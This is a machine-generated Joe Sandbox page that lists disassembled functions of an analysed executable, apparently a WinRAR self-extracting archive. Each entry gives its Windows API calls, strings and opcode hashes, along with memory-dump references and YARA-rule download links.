Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: Exception@8Throw_memset
String ID:
API String ID: 3963884845-3916222277
Opcode ID: f1e0d126ccc598ec3a566041394e6bcb644098b0f51350aeff818ebd60a47f7b
Instruction ID: 09102312ef323ca3808ce903e21c43e5cbc3ffe47ec5c8ccf28343ae0446d513
Opcode Fuzzy Hash: f1e0d126ccc598ec3a566041394e6bcb644098b0f51350aeff818ebd60a47f7b
Instruction Fuzzy Hash: 7F11D672E00118BACB14EFA9CE816DEBB75FF55344F20416BEA05F7241D6B86AD1C788

Function 0040D168 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 0040D1AF
GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 0040D1C7
SetDlgItemTextW.USER32(?,00000066,?), ref: 0040D1F5

Strings

GETPASSWORD1, xrefs: 0040D17A

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: ItemText$Dialog
String ID: GETPASSWORD1
API String ID: 1770891597-3292211884
Opcode ID: 85215617ba6e155f844f3755616e20d1bd0654f90a138bb46272cc890f705dea
Instruction ID: 8ab4af7042586728f975ac21911bc1a96d3ec999273aa8f9492a5ee4e386da3b
Opcode Fuzzy Hash: 85215617ba6e155f844f3755616e20d1bd0654f90a138bb46272cc890f705dea
Instruction Fuzzy Hash: 7C11C231900118BADB21AF95DD48EFB3A6CEF49754F400036F945BA0C0DA7C89569669

Function 00410B36 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(000001A0,?,0044E590,?,00410CC6,00000020,?,00409689,?,?,?,0040B86F,?,?,00000000,?), ref: 00410B6F
CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,00409689,?,?,?,0040B86F,?,?,00000000,?,?,00412073), ref: 00410B79
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,00409689,?,?,?,0040B86F,?,?,00000000,?,?,00412073), ref: 00410B8B

Strings

Thread pool initialization failed., xrefs: 00410BA3

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: d27777b125d8c7c4ccedfcdf7d7a3ce84e9323dbb13909622413f97aff576ef9
Instruction ID: 9f4177ae0e0da50f55a4e31e3315cc02682503906abf573712d3d7d038aac7b9
Opcode Fuzzy Hash: d27777b125d8c7c4ccedfcdf7d7a3ce84e9323dbb13909622413f97aff576ef9
Instruction Fuzzy Hash: F9115AB1600700AFD3305FA59895AE7BAE8FB54715F60483EF6DE86240D6B828C1CB18

Function 0040D807 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D740: _wcscpy.LIBCMT ref: 0040D745

RegOpenKeyExW.ADVAPI32(80000001,Software\WinRAR SFX,00000000,00000001,?,?), ref: 0040D842
RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0040D86F
RegCloseKey.ADVAPI32(?), ref: 0040D8A8

Strings

Software\WinRAR SFX, xrefs: 0040D838

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: CloseOpenQueryValue_wcscpy
String ID: Software\WinRAR SFX
API String ID: 2005349754-754673328
Opcode ID: 71ae37f9ecb2cb171e652d6c7bcee6a7bc9b58428e2d12d37b4f5fb14071ecdc
Instruction ID: 66b38c0b4021eb7562e057afb35d4252b169828fd7ffb761761a5b99cfe8c373
Opcode Fuzzy Hash: 71ae37f9ecb2cb171e652d6c7bcee6a7bc9b58428e2d12d37b4f5fb14071ecdc
Instruction Fuzzy Hash: 73111835A00208EBEF22EF95DD45FDE7BB8EF04344F5080B6F904A2190D7789A95DB69

Function 004050A4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 004050B1
SHBrowseForFolderW.SHELL32(?), ref: 004050EC

Strings

A, xrefs: 004050E5

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: BrowseFolderMalloc
String ID: A
API String ID: 3812826013-3554254475
Opcode ID: 2369a54d27e4e4691d9f9798ac45772536703bb9b1ea954af0e679125d43b3bb
Instruction ID: 17e689514a80ddaa969dd399fe9822a7dfca4b0f81013ab3b9828cf4850fbc5f
Opcode Fuzzy Hash: 2369a54d27e4e4691d9f9798ac45772536703bb9b1ea954af0e679125d43b3bb
Instruction Fuzzy Hash: 5E012372900219EBCB10CFA4D809BEF7BF8EF49311F1044A6E801A7241D7388A058BA9

Function 0040E3B9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 0040E3FE, 0040E430
RENAMEDLG, xrefs: 0040E414

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: e22283b9bc5e72540769d18aac47159cf207f53c44fde83f9b7c0921371c0d7c
Instruction ID: e20b02ce912c7b05c98a4eec90f8a2d2a6e5d86961f098508cb58b84786bd088
Opcode Fuzzy Hash: e22283b9bc5e72540769d18aac47159cf207f53c44fde83f9b7c0921371c0d7c
Instruction Fuzzy Hash: 3601B575705200BFC711EF15EE40A167BD5E78A354F04483BFA01A22A0D3769835DBAE

Function 0041DCF2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 0041DD05

Part of subcall function 0041DC60: ___BuildCatchObjectHelper.LIBCMT ref: 0041DC96

_UnwindNestedFrames.LIBCMT ref: 0041DD1C
___FrameUnwindToState.LIBCMT ref: 0041DD2A

Strings

csm, xrefs: 0041DD01, 0041DD16, 0041DD29, 0041DD47, 0041DD57

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: 80ea499b9455a035d0dddb51cdd3fe88855aa6b6e28e4107323293a3b82e8783
Instruction ID: 522d405591d9047dc49bc1e409ebde333ba922c0dd474eac2d58a7e68e311ef8
Opcode Fuzzy Hash: 80ea499b9455a035d0dddb51cdd3fe88855aa6b6e28e4107323293a3b82e8783
Instruction Fuzzy Hash: 46014BB1800109BBCF126F52DD45EEB7F6AEF08354F104016FD1815122D73A99B1DBE8

Function 0040BDE9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0040BDF8
FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 0040BE07

Strings

LTR, xrefs: 0040BE17, 0040BE1C, 0040BE2B
RTL, xrefs: 0040BE00, 0040BE05, 0040BE39

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: LTR$RTL
API String ID: 3537982541-719208805
Opcode ID: 4868ec0b688e46c80c0903c1a29f75735a1cefb7ec4e5993169b4a650a6cc8de
Instruction ID: 34bbbea369ea378bc52fd115093618c86814130dcae86682adac18341ef0eddd
Opcode Fuzzy Hash: 4868ec0b688e46c80c0903c1a29f75735a1cefb7ec4e5993169b4a650a6cc8de
Instruction Fuzzy Hash: 09F0243134022037E62067759C0AFE73B6CEB81714F00047AB705E61C0CFA8D89A87EE

Function 00423023 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0041D420), ref: 00423028
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00423038

Strings

IsProcessorFeaturePresent, xrefs: 00423032
KERNEL32, xrefs: 00423023

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: d1a69543e5d9c137391ec359d69e443d87eeccf18cec78cee5d5aadc997909ac
Instruction ID: d3258f4f80339163e2672f19ba2f23ecad20ea455fb9b5657f83571220678a16
Opcode Fuzzy Hash: d1a69543e5d9c137391ec359d69e443d87eeccf18cec78cee5d5aadc997909ac
Instruction Fuzzy Hash: 4FF09020B00A1AE2DB101FA1BC0A76F7B74FB80B42FD20091D2D2B0094CF3881B2C39A

Function 004195B4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32 ref: 004195EB
RegisterClassExW.USER32 ref: 0041960C

Strings

RarHtmlClassName, xrefs: 00419602
0, xrefs: 004195CA

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: ClassCursorLoadRegister
String ID: 0$RarHtmlClassName
API String ID: 1693014935-3342523147
Opcode ID: cffd64fa36fabc92e5a0d46448ee1112acf1deea6d5ced85c9bd34b50614c114
Instruction ID: 6468d3b39715e9384239594dfab13d89985d623456a05aa65b4c1771c327240d
Opcode Fuzzy Hash: cffd64fa36fabc92e5a0d46448ee1112acf1deea6d5ced85c9bd34b50614c114
Instruction Fuzzy Hash: B3F0C9B1D01218EBDB019F9AD844ADEFBF8FF59744F10805BE510B7250D7B516058FA9

Function 0040D2E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0040D301
SetEnvironmentVariableW.KERNEL32(sfxpar,00000002,00000000,00000000,?,?,00000400), ref: 0040D334

Strings

sfxpar, xrefs: 0040D32F
sfxcmd, xrefs: 0040D2FC

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: a8140f58090634511f44161ca886cab68263d6ea0c61b5af6c353b9493b3caa2
Instruction ID: cb44b0659a4409d4af72c0adb50c44061fc427c74c1d7ff7af2484f3202a1d71
Opcode Fuzzy Hash: a8140f58090634511f44161ca886cab68263d6ea0c61b5af6c353b9493b3caa2
Instruction Fuzzy Hash: 19E0EC36D0011436CA107AD69C06FA67B6CDFC0740F104037BE40A2080EAB898968AEB

Function 00410A29 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32,0040FB4C,00000001), ref: 00410A2E
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00410A3E

Strings

SetDllDirectoryW, xrefs: 00410A38
kernel32, xrefs: 00410A29

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: SetDllDirectoryW$kernel32
API String ID: 1646373207-2052158636
Opcode ID: 9877b7f07c448c74edacd698665b6da4c9425930a3fdfe75b90a4a82f5660a07
Instruction ID: 2a2e48f0206e7cda530a18f1d439dd53cb4355a312b8357b8cda9b89cfe3aa0e
Opcode Fuzzy Hash: 9877b7f07c448c74edacd698665b6da4c9425930a3fdfe75b90a4a82f5660a07
Instruction Fuzzy Hash: 76D0A7B03003215B4B1C0F315C29F272698AF60F82354913E7E06D0080CE6CC060A12F

Function 00408EBD Relevance: 6.1, APIs: 4, Instructions: 128filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,004072FA,?,?,?), ref: 00408F55
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,004072FA,?,?,?,?), ref: 00408F8C
SetFileTime.KERNEL32(?,00000000,00000000,00000000,?,004072FA,?,?,?,?), ref: 00408FFD
CloseHandle.KERNEL32(?,?,004072FA,?,?,?,?), ref: 00409006

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 724da5ab31416fc8e17f86cad73d2ccd851105d03da6f6afad9dba9d57fea368
Instruction ID: e555192889b31e85495df2b5ecf33e75b86025a05627dc537a7d8560313cfda0
Opcode Fuzzy Hash: 724da5ab31416fc8e17f86cad73d2ccd851105d03da6f6afad9dba9d57fea368
Instruction Fuzzy Hash: E441AD31900259AEDF11CBA4CD45FEE7BB8AF05314F0440AAF491B72D2CA789E85CB64

Function 00424B8E Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00424BC2
__isleadbyte_l.LIBCMT ref: 00424BF6
MultiByteToWideChar.KERNEL32(00000080,00000009,0041A53A,?,00000000,00000000,?,?,?,?,0041A53A,00000000,?), ref: 00424C27
MultiByteToWideChar.KERNEL32(00000080,00000009,0041A53A,00000001,00000000,00000000,?,?,?,?,0041A53A,00000000,?), ref: 00424C95

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 81987982e1df4478a7ec8bedb2574ddd47b8dcc3746f19ef86f9e98bcee9ea73
Instruction ID: d407e8e23266a15625d843eb749e4930819c0c9e03748901522efcf66a79c496
Opcode Fuzzy Hash: 81987982e1df4478a7ec8bedb2574ddd47b8dcc3746f19ef86f9e98bcee9ea73
Instruction Fuzzy Hash: 20310431B01265EFCF20DF68D840AAE3FA4EF41310F9544AAE8619B291D334DE40CB59

Function 0041388B Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00413890
_memset.LIBCMT ref: 004138B4
_memset.LIBCMT ref: 00413930
_malloc.LIBCMT ref: 00413963

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _memset$H_prolog_malloc
String ID:
API String ID: 1600808285-0
Opcode ID: dfdc19bc137521354847444799fb61c32f29d72c6aaeb966fb91c866f50d4e63
Instruction ID: 35b3ddfec5c8ddf8780acfa7a8e9d41188ab76d8c4cac51afa7e8ecc18e19c1a
Opcode Fuzzy Hash: dfdc19bc137521354847444799fb61c32f29d72c6aaeb966fb91c866f50d4e63
Instruction Fuzzy Hash: 133108B1E00216ABDB149FA5C8417EBB2A8EF14319F10013FE101E7281D7B89E80CBED

Function 00412C3A Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00412ABF: _memset.LIBCMT ref: 00412AD9

_memset.LIBCMT ref: 00412C70
_memset.LIBCMT ref: 00412C83
_memset.LIBCMT ref: 00412CC3
_memset.LIBCMT ref: 00412CD6

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 9d5df03678e0c5d5763a2dcc2e55ed97e5158c9e5106f151ba223aa709053554
Instruction ID: 3bd7284e88047aa05f9e2904dd1288557c44a51b9be7d9e7a06902af27226689
Opcode Fuzzy Hash: 9d5df03678e0c5d5763a2dcc2e55ed97e5158c9e5106f151ba223aa709053554
Instruction Fuzzy Hash: 20118C71A447445DE230D77A8C45FD7F2CC9B15308F44882FB3EEC7182D5AA7454875A

Function 00422EEE Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00422F14

Part of subcall function 00422D39: __fltout2.LIBCMT ref: 00422D65

__cftog_l.LIBCMT ref: 00422F3A
__cftoe_l.LIBCMT ref: 00422F6C

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 0671bf020c610778da801b485fdcf7f9952a953c4e96ddcef4d1f141fbcd164b
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: AC11903210015ABBCF125E84EE418EE3F32BB08354B898416FE1858130C6BBC9B2BB85

Function 004062D3 Relevance: 6.0, APIs: 4, Instructions: 39windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0040C0B2: LoadStringW.USER32 ref: 0040C103
Part of subcall function 0040C0B2: LoadStringW.USER32 ref: 0040C115

_swprintf.LIBCMT ref: 0041163E

Part of subcall function 00401B7B: __vswprintf_c_l.LIBCMT ref: 00401B8E

GetLastError.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?), ref: 00411646
MessageBoxW.USER32 ref: 00411668
SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00411675

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
